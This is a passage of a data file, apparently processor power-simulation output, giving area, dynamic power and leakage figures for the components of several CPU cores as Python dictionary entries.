'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.199321,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0173949,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.199279,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.128646,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.3986,
'Execution Unit/Register Files/Runtime Dynamic': 0.146041,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.535225,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 1.11318,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 3.80853,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00228312,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00228312,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00200304,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000783307,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00184801,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00841729,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0213744,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.12367,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.342323,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.42004,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96874,
'Instruction Fetch Unit/Runtime Dynamic': 0.915826,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0978673,
'L2/Runtime Dynamic': 0.0147116,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.97925,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.33351,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0887144,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0887144,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 4.39988,
'Load Store Unit/Runtime Dynamic': 1.85974,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.218755,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.437509,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0776367,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0789262,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.056653,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.692712,
'Memory Management Unit/Runtime Dynamic': 0.135579,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 26.1087,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.695385,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0329045,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.233338,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.961628,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 7.69601,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0711588,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.25858,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.382562,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.209641,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.338143,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.170683,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.718467,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.181117,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.85235,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0722741,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00879328,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.090297,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0650317,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.162571,
'Execution Unit/Register Files/Runtime Dynamic': 0.0738249,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.208024,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.462859,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.91911,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00155458,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00155458,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00138614,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000554157,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000934185,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00542949,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0137582,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0625166,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.97659,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.184138,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.212335,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 6.3881,
'Instruction Fetch Unit/Runtime Dynamic': 0.478177,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0554479,
'L2/Runtime Dynamic': 0.0112482,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.80385,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.765722,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0506874,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0506873,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.0432,
'Load Store Unit/Runtime Dynamic': 1.06638,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.124986,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.249972,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0443581,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.045061,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.24725,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0305711,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.479558,
'Memory Management Unit/Runtime Dynamic': 0.075632,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 18.4081,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.19012,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0117721,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.102482,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.304375,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.85492,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.057696,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.248006,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.309307,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.193643,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.312339,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.157658,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.66364,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.174051,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.70975,
'Execution Unit/Register Files/Area': 0.570804,
